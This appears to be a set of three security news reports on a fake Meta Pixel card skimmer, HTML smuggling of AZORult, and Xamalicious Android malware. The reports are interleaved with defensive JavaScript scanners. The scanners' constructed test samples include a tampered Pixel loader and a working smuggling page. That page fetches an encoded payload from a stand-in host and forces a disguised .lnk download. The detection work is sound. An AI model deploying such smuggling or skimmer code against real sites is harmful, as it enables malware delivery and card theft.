Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker
https://www.indiavpn.org/2024/04/12/sneaky-credit-card-skimmer-disguised-as-harmless-facebook-tracker/

Apr 12, 2024 | Newsroom | Web Security / WordPress


Cybersecurity researchers have discovered a credit card skimmer that’s concealed within a fake Meta Pixel tracker script in an attempt to evade detection.

Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the “Miscellaneous Scripts” section of the Magento admin panel.

“Custom script editors are popular with bad actors because they allow for external third party (and malicious) JavaScript and can easily pretend to be benign by leveraging naming conventions that match popular scripts like Google Analytics or libraries like JQuery,” security researcher Matt Morrow said.

The bogus Meta Pixel tracker script identified by the web security company contains elements similar to its legitimate counterpart, but closer examination reveals added JavaScript that replaces references to the domain "connect.facebook[.]net" with "b-connected[.]com."


While the former is the genuine domain that serves the Pixel tracking code, the replacement domain is used to load an additional malicious script ("fbevents.js") that checks whether the victim is on a checkout page and, if so, serves a fraudulent overlay to capture their credit card details.

It’s worth noting that “b-connected[.]com” is a legitimate e-commerce website that has been compromised at some point to host the skimmer code. What’s more, the information entered into the fake form is exfiltrated to another compromised site (“www.donjuguetes[.]es”).

To mitigate such risks, site owners are advised to keep their sites and plugins up to date, periodically review admin accounts to confirm that every one of them is legitimate, and rotate passwords regularly.

This is particularly important as threat actors are known to leverage weak passwords and flaws in WordPress plugins to gain elevated access to a target site and add rogue admin users, which are then used to perform various other activities, including adding additional plugins and backdoors.


“Because credit card stealers often wait for keywords such as ‘checkout’ or ‘onepage,’ they may not become visible until the checkout page has loaded,” Morrow said.

“Since most checkout pages are dynamically generated based on cookie data and other variables passed to the page, these scripts evade public scanners and the only way to identify the malware is to check the page source or watch network traffic. These scripts run silently in the background.”
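The two passages above describe what a fake Pixel loader looks like (the standard boilerplate with the fbevents.js host swapped out) and how it hides (it waits for a checkout URL). The following is an added example, not code from Sucuri or the article, that scans a page's HTML for Pixel-style loader snippets and flags any that fetch fbevents.js from a host other than connect.facebook.net or that inspect the URL for checkout keywords. The sample pages and the attacker host `evil-cdn.example` are constructed for the demonstration; the article names the real compromised host in defanged form.

```javascript
// Added example, not code from Sucuri or the article: find Meta Pixel-style
// loader snippets in a page's HTML and flag any that pull fbevents.js from a
// host other than connect.facebook.net, or that gate on a checkout URL.
const LEGIT_PIXEL_HOST = 'connect.facebook.net';

// Collect the bodies of inline <script> tags from raw HTML.
function extractInlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const scripts = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) scripts.push(m[1]);
  }
  return scripts;
}

// The genuine Pixel loader passes the fbevents.js URL as a string literal;
// return the hostname of every such literal found in one script.
function fbeventsHosts(script) {
  const hosts = new Set();
  const re = /['"]((?:https?:)?\/\/[^'"]*fbevents\.js[^'"]*)['"]/g;
  let m;
  while ((m = re.exec(script)) !== null) {
    const url = m[1].startsWith('//') ? 'https:' + m[1] : m[1];
    hosts.add(new URL(url).hostname.toLowerCase());
  }
  return hosts;
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function analysePixelSnippets(html) {
  const findings = [];
  for (const script of extractInlineScripts(html)) {
    const looksLikePixel = /\bfbq\s*\(/.test(script) || /fbevents\.js/.test(script);
    if (!looksLikePixel) continue;
    for (const host of fbeventsHosts(script)) {
      if (host !== LEGIT_PIXEL_HOST) {
        findings.push({ host, reason: 'Pixel-style loader fetches fbevents.js from a non-Facebook host' });
      }
    }
    // Skimmers typically wait for the checkout page before doing anything.
    if (/\b(checkout|onepage)\b/i.test(script)) {
      findings.push({ host: null, reason: 'Pixel-style script inspects the URL for checkout/onepage' });
    }
  }
  return findings;
}

// Constructed sample: the standard loader boilerplate with the real Facebook host.
const LEGIT_PAGE = `<html><head><script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};n.queue=[];
t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window,document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init','000000000000000');fbq('track','PageView');
</script></head><body>shop</body></html>`;

// Constructed sample: the same boilerplate with the loader host swapped for a
// hypothetical attacker host (evil-cdn.example) and a checkout check bolted on.
const FAKE_PAGE = LEGIT_PAGE
  .replace('https://connect.facebook.net/en_US/fbevents.js', 'https://evil-cdn.example/en_US/fbevents.js')
  .replace("fbq('track','PageView');", "fbq('track','PageView');if(location.href.indexOf('checkout')>-1){fbq('track','Checkout');}");

console.log(analysePixelSnippets(LEGIT_PAGE)); // []
console.log(analysePixelSnippets(FAKE_PAGE));  // two findings, host evil-cdn.example
```

Run it against the source of the checkout page itself, not the home page: as the quote above notes, the injected code is often only present, or only active, once the checkout URL has loaded, so a scan of the landing page can come back clean.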

The development comes as Sucuri also revealed that sites built with WordPress and Magento are the target of another malware called Magento Shoplift. Earlier variants of Magento Shoplift have been detected in the wild since September 2023.


The attack chain starts with injecting an obfuscated JavaScript snippet into a legitimate JavaScript file; the snippet loads a second script from jqueurystatics[.]com over WebSocket Secure (WSS), which in turn facilitates credit card skimming and data theft while masquerading as a Google Analytics script.

“WordPress has become a massive player in e-commerce as well, thanks to the adoption of Woocommerce and other plugins that can easily turn a WordPress site into a fully-featured online store,” researcher Puja Srivastava said.

“This popularity also makes WordPress stores a prime target — and attackers are modifying their MageCart e-commerce malware to target a wider range of CMS platforms.”

Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites
https://www.indiavpn.org/2024/03/18/hackers-using-sneaky-html-smuggling-to-deliver-malware-via-fake-google-sites/
Mon, 18 Mar 2024 12:56:41 +0000


Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.

“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.

The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with the intent of collecting sensitive data to sell on underground forums.

AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It’s typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.


Once installed, it’s capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.

The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.

HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch malware on the client by "smuggling" an encoded malicious payload past inspection.

Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and reconstructs the payload on the host device, bypassing security controls such as email gateways that inspect only attachments.

The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.

The downloaded file is a shortcut file (.LNK) masquerading as a PDF bank statement; launching it kicks off a chain of intermediate batch and PowerShell scripts fetched from an already compromised domain.


One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.

“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Michael Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”

“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”
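The explanation of HTML smuggling above, together with the variant this campaign uses (payload fetched from a separate JSON file on a compromised site, then decoded and written out by the browser), maps onto a small set of client-side primitives that can be searched for statically. The following is an added example, not code from Netskope or the article: a triage check that scores an HTML file on those indicators and on cross-origin fetches of the payload. The two sample pages, the hosts `compromised-site.example` and `docs.example`, and the scoring weights are all constructed for the demonstration.

```javascript
// Added example, not code from Netskope or the article: static triage of an
// HTML file for HTML-smuggling indicators, including the variant where the
// encoded payload is fetched from an external JSON file rather than embedded.
const INDICATORS = [
  { id: 'decode',    weight: 1, re: /\batob\s*\(|\bTextDecoder\b|\bcharCodeAt\s*\(/i,
    what: 'client-side decoding of binary data' },
  { id: 'blob',      weight: 2, re: /new\s+Blob\s*\(/,
    what: 'file assembled in the browser as a Blob' },
  { id: 'objecturl', weight: 2, re: /URL\.createObjectURL\s*\(|msSaveOrOpenBlob\s*\(/,
    what: 'object URL or save API used to materialise the file' },
  { id: 'download',  weight: 2, re: /\.download\s*=|<a\b[^>]*\sdownload[\s=>]/i,
    what: 'download attribute forces a file to disk' },
  { id: 'autoclick', weight: 1, re: /\.click\s*\(\s*\)/,
    what: 'synthetic click triggers the download without user action' },
];

// URLs passed to fetch() or XMLHttpRequest.open() whose host differs from the
// host the page is served from (pageHost is supplied by the caller).
function remotePayloadSources(html, pageHost) {
  const re = /\b(?:fetch\s*\(|\.open\s*\(\s*['"](?:GET|POST)['"]\s*,)\s*['"](https?:\/\/[^'"]+)['"]/gi;
  const sources = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (new URL(m[1]).hostname.toLowerCase() !== pageHost.toLowerCase()) sources.push(m[1]);
  }
  return sources;
}

// Returns { score, hits, remote, verdict }. A page is only called
// 'likely-smuggling' when it both materialises a file and scores highly;
// a plain same-origin download link alone stays 'clean'.
function triageHtml(html, pageHost) {
  const matched = INDICATORS.filter(i => i.re.test(html));
  const remote = remotePayloadSources(html, pageHost);
  let score = matched.reduce((s, i) => s + i.weight, 0);
  if (remote.length > 0) score += 2; // payload body pulled from another site
  const materialises = matched.some(i => ['blob', 'objecturl', 'download'].includes(i.id));
  const verdict = materialises && score >= 5 ? 'likely-smuggling' : score >= 3 ? 'suspicious' : 'clean';
  return { score, hits: matched.map(i => ({ id: i.id, what: i.what })), remote, verdict };
}

// Constructed sample: a CAPTCHA-gated page in the style described above,
// fetching the encoded payload from a hypothetical compromised host.
const SMUGGLED_PAGE = `<!doctype html>
<html><body>
<p>Verify you are human to view the document.</p>
<button id="go">I am not a robot</button>
<script>
document.getElementById('go').onclick = async () => {
  const r = await fetch('https://compromised-site.example/assets/data.json');
  const j = await r.json();
  const bin = atob(j.d);
  const bytes = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  const blob = new Blob([bytes], { type: 'application/octet-stream' });
  const a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'Bank_Statement.pdf.lnk';
  document.body.appendChild(a);
  a.click();
};
</script>
</body></html>`;

// Constructed sample: an ordinary page with a same-origin download link and a
// same-origin JSON fetch, which should not be flagged.
const BENIGN_PAGE = `<!doctype html>
<html><body>
<h1>Quarterly report</h1>
<a href="/files/report-q1.pdf" download>Download the PDF</a>
<ul id="recent"></ul>
<script>
fetch('https://docs.example/api/recent.json').then(r => r.json()).then(list => {
  document.getElementById('recent').textContent = list.length + ' documents';
});
</script>
</body></html>`;

console.log(triageHtml(SMUGGLED_PAGE, 'sites.google.com').verdict); // likely-smuggling
console.log(triageHtml(BENIGN_PAGE, 'docs.example').verdict);       // clean
```

The cross-origin fetch check is what distinguishes this campaign's variant from classic smuggling, where the blob is already inline; a mail gateway or proxy that only looks for an embedded base64 blob would miss it, while a page whose script both pulls opaque data from another site and writes it to disk through a Blob and a download attribute has very few legitimate explanations.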

The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.


AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.

Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.

“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.

In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.

That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.

Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of the remote access trojans like AsyncRAT, njRAT, and Remcos.

New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices
https://www.indiavpn.org/2023/12/27/new-sneaky-xamalicious-android-malware-hits-over-327000-devices/

Dec 27, 2023 | Newsroom | Privacy / App Security


A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices.

Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it’s developed using an open-source mobile app framework called Xamarin and abuses the operating system’s accessibility permissions to fulfill its objectives.

It’s also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining that the device is a worthwhile target.

The second stage is “dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent,” security researcher Fernando Ruiz said.

The cybersecurity firm said it identified 25 apps that come with this active threat, some of which were distributed on the official Google Play Store since mid-2020. The apps are estimated to have been installed at least 327,000 times.


A majority of the infections have been reported in Brazil, Argentina, the U.K., Australia, the U.S., Mexico, and other parts of Europe and the Americas. Some of the apps are listed below –

  • Essential Horoscope for Android (com.anomenforyou.essentialhoroscope)
  • 3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft)
  • Logo Maker Pro (com.vyblystudio.dotslinkpuzzles)
  • Auto Click Repeater (com.autoclickrepeater.free)
  • Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator)
  • Sound Volume Extender (com.muranogames.easyworkoutsathome)
  • LetterLink (com.regaliusgames.llinkgame)
  • NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com.Ushak.NPHOROSCOPENUMBER)
  • Step Keeper: Easy Pedometer (com.browgames.stepkeepereasymeter)
  • Track Your Sleep (com.shvetsStudio.trackYourSleep)
  • Sound Volume Booster (com.devapps.soundvolumebooster)
  • Astrological Navigator: Daily Horoscope & Tarot (com.Osinko.HoroscopeTaro)
  • Universal Calculator (com.Potap64.universalcalculator)

Xamalicious, which typically masquerades as health, games, horoscope, and productivity apps, is the latest in a long list of malware families that abuse Android’s accessibility services, requesting access to the service upon installation to carry out its tasks.


“To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it’s encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with an A128CBC-HS256 algorithm,” Ruiz noted.

Even more troublingly, the first-stage dropper contains functions to self-update the main Android package (APK) file, meaning it can be weaponized to act as spyware or a banking trojan without any user interaction.

McAfee said it identified a link between Xamalicious and an ad-fraud app named Cash Magnet, which facilitates app download and automated clicker activity to illicitly earn revenue by clicking on ads.


“Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets,” Ruiz said.


Android Phishing Campaign Targets India With Banker Malware

The disclosure comes as the cybersecurity company detailed a phishing campaign that employs social messaging apps like WhatsApp to distribute rogue APK files that impersonate legitimate banks such as the State Bank of India (SBI) and prompt the user to install them to complete a mandatory Know Your Customer (KYC) procedure.

Once installed, the app asks the user to grant it SMS-related permissions and redirects to a fake page that captures not only the victim’s credentials but also their account, credit/debit card, and national identity information.

The harvested data, alongside the intercepted SMS messages, are forwarded to an actor-controlled server, thereby allowing the adversary to complete unauthorized transactions.

It’s worth noting that Microsoft last month warned of a similar campaign that utilizes WhatsApp and Telegram as distribution vectors to target Indian online banking users.

“India underscores the acute threat posed by this banking malware within the country’s digital landscape, with a few hits found elsewhere in the world, possibly from Indian SBI users living in other countries,” researchers Neil Tyagi and Ruiz said.
